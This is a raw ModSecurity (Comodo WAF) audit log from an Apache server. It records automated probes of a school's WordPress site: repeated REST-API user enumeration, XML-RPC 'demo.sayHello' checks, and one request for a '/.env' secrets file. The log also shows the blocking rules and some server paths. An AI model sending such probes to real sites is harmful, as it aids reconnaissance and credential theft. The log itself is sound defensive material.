[tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746842891155494 2848 (- - -) Stopwatch2: 1746842891155494 2848; combined=1297, p1=431, p2=834, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a650e279-Z-- --d310b96b-A-- [10/May/2025:09:08:20 +0700] aB61FBLuBiaF9R054QBbJgAAABc 103.236.140.4 54042 103.236.140.4 8181 --d310b96b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d310b96b-C-- demo.sayHello --d310b96b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d310b96b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746842900628539 6485 (- - -) Stopwatch2: 1746842900628539 6485; combined=4664, p1=636, p2=3786, p3=40, p4=43, p5=96, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d310b96b-Z-- --4d6fe71f-A-- [10/May/2025:09:16:52 +0700] aB63FBLuBiaF9R054QBbMwAAABY 103.236.140.4 54088 103.236.140.4 8181 --4d6fe71f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.156.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.156.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d6fe71f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d6fe71f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746843412854862 3496 (- - -) Stopwatch2: 1746843412854862 3496; combined=1546, p1=553, p2=956, p3=0, p4=0, p5=37, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d6fe71f-Z-- --55dbdb1c-A-- [10/May/2025:09:22:12 +0700] aB64VBLuBiaF9R054QBbOwAAAAo 103.236.140.4 54130 103.236.140.4 8181 --55dbdb1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.7.2.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.7.2.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55dbdb1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55dbdb1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746843732244638 3391 (- - -) Stopwatch2: 1746843732244638 3391; combined=1503, p1=482, p2=977, p3=0, p4=0, p5=43, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55dbdb1c-Z-- --2bb81949-A-- [10/May/2025:09:48:13 +0700] aB6-bdr9PbfRBMhzxmRbAgAAAEo 103.236.140.4 54374 103.236.140.4 8181 --2bb81949-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 159.223.132.86 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 159.223.132.86 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2bb81949-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bb81949-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746845293536927 817 (- - -) Stopwatch2: 1746845293536927 817; combined=344, p1=309, p2=0, p3=0, p4=0, p5=35, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb81949-Z-- --f6b64148-A-- [10/May/2025:10:05:52 +0700] aB7CkBLuBiaF9R054QBbpwAAABg 103.236.140.4 54600 103.236.140.4 8181 --f6b64148-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 113.199.192.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 113.199.192.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f6b64148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6b64148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746846352884553 2510 (- - -) Stopwatch2: 1746846352884553 2510; combined=1157, p1=393, p2=735, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6b64148-Z-- --821cb001-A-- [10/May/2025:10:19:24 +0700] aB7FvKuC4AqLGUOyzyX8AgAAAJc 103.236.140.4 54666 103.236.140.4 8181 --821cb001-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --821cb001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --821cb001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847164963077 2893 (- - -) Stopwatch2: 1746847164963077 2893; combined=1272, p1=453, p2=787, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --821cb001-Z-- --22af1c7d-A-- [10/May/2025:10:19:29 +0700] aB7FwRLuBiaF9R054QBbrgAAABA 103.236.140.4 54670 103.236.140.4 8181 --22af1c7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22af1c7d-C-- demo.sayHello --22af1c7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22af1c7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847169725652 5143 (- - -) Stopwatch2: 1746847169725652 5143; combined=3840, p1=467, p2=3169, p3=34, p4=29, p5=83, sr=65, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22af1c7d-Z-- --c61b8e2d-A-- [10/May/2025:10:20:38 +0700] aB7GBhLuBiaF9R054QBbsgAAABM 103.236.140.4 54690 103.236.140.4 8181 --c61b8e2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c61b8e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c61b8e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847238870619 2699 (- - -) Stopwatch2: 1746847238870619 2699; combined=1443, p1=462, p2=950, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c61b8e2d-Z-- --7efbd479-A-- [10/May/2025:10:20:44 +0700] aB7GDMi6w7GTj2w44Z6cWAAAAM8 103.236.140.4 54694 103.236.140.4 8181 --7efbd479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7efbd479-C-- demo.sayHello --7efbd479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7efbd479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847244039504 5374 (- - -) Stopwatch2: 1746847244039504 5374; combined=3999, p1=528, p2=3259, p3=28, p4=32, p5=90, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7efbd479-Z-- --3916235c-A-- [10/May/2025:10:20:48 +0700] aB7GEBLuBiaF9R054QBbtAAAABY 103.236.140.4 54698 103.236.140.4 8181 --3916235c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3916235c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3916235c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847248645859 2653 (- - -) Stopwatch2: 1746847248645859 2653; combined=1179, p1=420, p2=723, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3916235c-Z-- --6c51ea5b-A-- [10/May/2025:10:20:54 +0700] aB7GFhLuBiaF9R054QBbtgAAABg 103.236.140.4 54702 103.236.140.4 8181 --6c51ea5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c51ea5b-C-- demo.sayHello --6c51ea5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c51ea5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847254738246 5610 (- - -) Stopwatch2: 1746847254738246 5610; combined=4143, p1=544, p2=3408, p3=28, p4=31, p5=78, sr=80, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c51ea5b-Z-- --3fea9f0d-A-- [10/May/2025:10:22:54 +0700] aB7GjhLuBiaF9R054QBbuQAAAAQ 103.236.140.4 54732 103.236.140.4 8181 --3fea9f0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fea9f0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fea9f0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847374147728 2778 (- - -) Stopwatch2: 1746847374147728 2778; combined=1237, p1=441, p2=766, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fea9f0d-Z-- --1c57f736-A-- [10/May/2025:10:23:06 +0700] aB7GmhLuBiaF9R054QBbvQAAAAc 103.236.140.4 54742 103.236.140.4 8181 --1c57f736-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1c57f736-C-- demo.sayHello --1c57f736-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c57f736-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847386419731 6760 (- - -) Stopwatch2: 1746847386419731 6760; combined=4793, p1=606, p2=3934, p3=38, p4=44, p5=101, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c57f736-Z-- --120e397f-A-- [10/May/2025:10:23:37 +0700] aB7GuRLuBiaF9R054QBbvwAAAAs 103.236.140.4 54754 103.236.140.4 8181 --120e397f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --120e397f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --120e397f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847417207704 2988 (- - -) Stopwatch2: 1746847417207704 2988; combined=1260, p1=420, p2=805, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --120e397f-Z-- --e367903e-A-- [10/May/2025:10:23:43 +0700] aB7GvxLuBiaF9R054QBbwAAAAA4 103.236.140.4 54758 103.236.140.4 8181 --e367903e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e367903e-C-- demo.sayHello --e367903e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e367903e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746847423807620 5380 (- - -) Stopwatch2: 1746847423807620 5380; combined=4060, p1=501, p2=3343, p3=30, p4=32, p5=92, sr=72, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e367903e-Z-- --4aa97a56-A-- [10/May/2025:10:23:45 +0700] aB7Gwdr9PbfRBMhzxmRbHQAAAE8 103.236.140.4 54760 103.236.140.4 8181 --4aa97a56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4aa97a56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aa97a56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746847425496543 2065 (- - -) Stopwatch2: 1746847425496543 2065; combined=992, p1=346, p2=603, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aa97a56-Z-- --e039f969-A-- [10/May/2025:10:23:52 +0700] aB7GyBLuBiaF9R054QBbwgAAABI 103.236.140.4 54766 103.236.140.4 8181 --e039f969-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e039f969-C-- demo.sayHello --e039f969-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e039f969-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 